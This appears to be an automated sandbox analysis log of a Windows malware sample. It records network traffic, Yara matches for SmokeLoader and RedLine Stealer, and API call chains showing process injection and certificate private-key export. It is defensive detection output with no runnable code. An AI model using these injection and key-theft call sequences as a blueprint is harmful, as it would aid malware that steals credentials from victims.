    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49915 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49935 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49942 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49951 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49959 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49965 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49971 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49977 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49983 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49989 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49995 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50008 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50015 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50024 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50030 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50036 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50043 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50055 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50060 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50061 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5804, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7524, type: MEMORYSTR
    Source: Yara matchFile source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EF162B GetKeyboardState,ToUnicode,19_2_02EF162B
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF6F2D63220

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004032C7 CreateFileW,GetForegroundWindow,NtEnumerateKey,wcsstr,0_2_004032C7
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00403103 RtlCreateUserThread,NtTerminateProcess,6_2_00403103
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_004014FB LocalAlloc,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FB
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401641 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401641
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00403257 RtlCreateUserThread,NtTerminateProcess,6_2_00403257
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401606 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401606
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401613 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401613
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401627 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401627
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00403433 GetKeyboardLayoutList,OpenProcessToken,GetTokenInformation,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,6_2_00403433
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_004015FB VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015FB
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00403103 RtlCreateUserThread,NtTerminateProcess,8_2_00403103
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_004014FB LocalAlloc,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014FB
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00401641 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401641
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00403257 RtlCreateUserThread,NtTerminateProcess,8_2_00403257
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00401606 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401606
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00401613 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401613
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00401627 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401627
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_004015FB VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015FB
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02754B92 RtlMoveMemory,NtUnmapViewOfSection,13_2_02754B92
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_027533C3 NtQueryInformationFile,13_2_027533C3
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0275342B NtQueryObject,NtQueryObject,RtlMoveMemory,13_2_0275342B
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0275349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,13_2_0275349B
    Source: C:\Windows\explorer.exeCode function: 15_2_00CD38B0 NtUnmapViewOfSection,15_2_00CD38B0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00141016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_00141016
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00141819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_00141819
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00141A80 NtCreateSection,NtMapViewOfSection,16_2_00141A80
    Source: C:\Windows\explorer.exeCode function: 18_2_0077355C NtUnmapViewOfSection,18_2_0077355C
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EF1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,19_2_02EF1016
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EF1B26 NtCreateSection,NtMapViewOfSection,19_2_02EF1B26
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EF18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,19_2_02EF18BF
    Source: C:\Windows\explorer.exeCode function: 21_2_004D370C NtUnmapViewOfSection,21_2_004D370C
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_004034336_2_00403433
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D69AC89_2_00007FF6F2D69AC8
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D632209_2_00007FF6F2D63220
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6B4289_2_00007FF6F2D6B428
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6DC0C9_2_00007FF6F2D6DC0C
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6A7789_2_00007FF6F2D6A778
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6213C9_2_00007FF6F2D6213C
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6A5209_2_00007FF6F2D6A520
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0275219813_2_02752198
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0275C2F913_2_0275C2F9
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0276B35C13_2_0276B35C
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_027A443813_2_027A4438
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0276B97E13_2_0276B97E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02756E6A13_2_02756E6A
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02775F0813_2_02775F08
    Source: C:\Windows\explorer.exeCode function: 15_2_00CD1E2015_2_00CD1E20
    Source: C:\Windows\explorer.exeCode function: 18_2_0077286018_2_00772860
    Source: C:\Windows\explorer.exeCode function: 18_2_0077205418_2_00772054
    Source: C:\Windows\explorer.exeCode function: 21_2_004D20F421_2_004D20F4
    Source: C:\Windows\explorer.exeCode function: 21_2_004D2A0421_2_004D2A04
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\B972.exe B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02758801 appears 38 times
    Source: ctMI3TYXpX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
